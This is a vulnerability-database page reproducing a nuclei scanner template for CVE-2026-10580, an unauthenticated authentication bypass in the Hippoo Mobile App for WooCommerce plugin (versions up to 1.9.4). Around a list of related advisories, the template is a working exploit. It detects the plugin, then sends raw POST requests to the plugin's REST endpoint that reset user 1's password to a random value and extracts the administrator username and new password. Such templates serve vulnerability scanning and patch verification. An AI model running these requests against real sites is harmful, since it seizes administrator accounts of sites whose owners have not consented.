Lucene search
+L

Hippoo Mobile App for WooCommerce <= 1.9.4 - Authentication Bypass to Admin Account Takeover

🗓️ 09 Sep 2026 02:52:56Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 35 Views

Unauthenticated bypass in Hippoo Mobile App for WooCommerce enables admin takeover via password reset.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for CVE-2026-10580
30 Jun 202609:08
githubexploit
attackerkb
ATTACKERKB
CVE-2026-10580
5 Jun 202618:31
attackerkb
circl
Circl
CVE-2026-10580
5 Jun 202620:01
circl
cnnvd
CNNVD
WordPress plugin Hippoo Mobile App for WooCommerce 授权问题漏洞
5 Jun 202600:00
cnnvd
cve
CVE
CVE-2026-10580
5 Jun 202618:31
cve
cvelist
Cvelist
CVE-2026-10580 Hippoo Mobile App for WooCommerce <= 1.9.4 - Unauthenticated Authentication Bypass to Administrator Account Takeover via REST API
5 Jun 202618:31
cvelist
euvd
EUVD
EUVD-2026-34887
5 Jun 202618:31
euvd
kitploit
Kitploit
CVE-2026-10580
8 Sep 202604:07
kitploit
kitploit
Kitploit
By-Poloss..-..CVE-2026-10580
4 Sep 202609:54
kitploit
nvd
NVD
CVE-2026-10580
5 Jun 202619:16
nvd
Rows per page
id: CVE-2026-10580

info:
  name: Hippoo Mobile App for WooCommerce <= 1.9.4 - Authentication Bypass to Admin Account Takeover
  author: pussycat0x
  severity: critical
  description: |
    Hippoo Mobile App for WooCommerce WordPress plugin <= 1.9.4 contains an authentication bypass caused by logic conflation in user permission checks, letting unauthenticated attackers take over administrator accounts via REST API password reset.
  impact: |
    Unauthenticated attackers can reset any WordPress user's password, including administrators, gaining full administrative control of the site.
  remediation: |
    Update to a version later than 1.9.4 or the latest available version.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hippoo/hippoo-mobile-app-for-woocommerce-194-unauthenticated-authentication-bypass-to-administrator-account-takeover-via-rest-api
    - https://plugins.trac.wordpress.org/changeset/3557733
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-10580
    epss-score: 0.02948
    epss-percentile: 0.86272
    cwe-id: CWE-285
  metadata:
    max-request: 2
    vendor: hippoo
    product: hippoo-mobile-app-for-woocommerce
    framework: wordpress
    verified: true
    shodan-query: http.component:"wordpress"
    fofa-query: body="hippoo"
  tags: cve,cve2026,wordpress,wp-plugin,hippoo,woocommerce,intrusive

variables:
  new_password: "{{rand_base(16)}}"

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/hippoo/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Hippoo')"
        condition: and
        internal: true

    extractors:
      - type: regex
        name: plugin_version
        part: body
        group: 1
        regex:
          - 'Stable tag:\s*([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /wp-json/wc-hippoo/v1/ext/wp/v2/users/1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"password":"{{new_password}}"}

      - |
        POST /wp-json/wc-hippoo/v1/ext/wp/v2/users/1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"password":"{{new_password}}"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 || status_code_2 == 200'
          - 'contains_any(body, "is_super_admin","capabilities")'
          - 'contains(body, "woocommerce_meta")'
        condition: and

    extractors:
      - type: regex
        name: username
        part: body
        group: 1
        regex:
          - '"username":"([^"]+)"'

      - type: dsl
        name: new_password
        dsl:
          - new_password
# digest: 490a004630440220508bf93591f35a9a3d14b0e51c7615e46f4ae5b150021b5f7ec67f2df3af9ac7022025e09dfb6e50cb923a6ceda6a8180841cd235ee916f777e9050234c979701c90:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Jun 2026 19:03Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.19.8
EPSS0.02948
SSVC
35